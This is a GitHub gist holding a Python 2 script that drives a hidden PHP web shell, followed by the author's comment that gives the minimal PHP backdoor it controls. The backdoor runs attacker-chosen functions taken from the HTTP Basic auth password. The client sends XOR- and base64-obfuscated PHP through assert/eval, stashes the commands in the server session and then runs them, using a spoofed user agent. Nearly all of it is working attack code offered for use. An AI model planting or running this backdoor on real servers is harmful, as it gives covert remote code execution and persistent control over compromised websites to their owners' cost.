Skip to content

Instantly share code, notes, and snippets.

@enkomio
Created May 13, 2017 19:16
Show Gist options
  • Save enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4 to your computer and use it in GitHub Desktop.
Save enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4 to your computer and use it in GitHub Desktop.
Script to interact with hidden web shell
import httplib2
import binascii
import os
import base64
import sys
if len(sys.argv) < 3:
print "Usage: {0} <url> <command>".format(sys.argv[0])
exit(1)
def generate_random_string(len):
return binascii.hexlify(os.urandom(len))
def xor_obfuscate(data, key):
output = ''
for i in xrange(len(data)):
output += chr(ord(data[i]) ^ ord(key[i % len(key)]))
return output
def send_request(url, data, session_cookie):
try:
auth = base64.b64encode('' + ":" + data)
http = httplib2.Http(disable_ssl_certificate_validation=True)
headers = {
"User-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Authorization": 'Basic ' + auth,
"Cookie": session_cookie
}
_, html = http.request(url, 'GET', headers=headers)
return html
except:
return ''
# global variables
url = sys.argv[1]
php_command = sys.argv[2]
session_cookie = "PHPSESSID=" + generate_random_string(13)
shell_key = "shell"
encryption_key = generate_random_string(25)
print "[+] Using session value: " + session_cookie
print "[+] Encryption key: " + encryption_key
###########################################
# step 1 - implant shell in user session #
###########################################
code_exec = """
session_start();
$a = explode("|", $_SERVER['PHP_AUTH_PW']);
$_SESSION[$a[2]] = $a[3];
"""
encrypted_php_command = xor_obfuscate(php_command, encryption_key)
code_install_shell = shell_key + "|" + base64.b64encode(encrypted_php_command)
data = "assert|eval(base64_decode('{0}').';return True;')|{1}".format(base64.b64encode(code_exec), code_install_shell)
send_request(url, data, session_cookie)
print "[+] Installed command in user session"
###########################################
# step 2 - invoke shell stored in session #
###########################################
code_exec = ("""
session_start();
if (array_key_exists("{0}", $_SESSION))
{{
function xor_deobf($str, $key)
{{
$out = '';
for($i = 0; $i < strlen($str); ++$i)
$out .= ($str[$i] ^ $key[$i % strlen($key)]);
return $out;
}}
eval(xor_deobf(base64_decode($_SESSION["{0}"]), "{1}"));
}}
""").format(shell_key, encryption_key)
data = "assert|eval(base64_decode('{0}').';return True;')".format(base64.b64encode(code_exec))
print "[+] Result: " + send_request(url, data, session_cookie=session_cookie)
@enkomio
Copy link
Author

enkomio commented May 13, 2017

It is supposed to interact with the following PHP script:

<?php
if (isset($_SERVER['PHP_AUTH_PW'])) 
{
	$a = explode("|", $_SERVER['PHP_AUTH_PW']);	
	@$a[0]($a[1]);
}
?>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment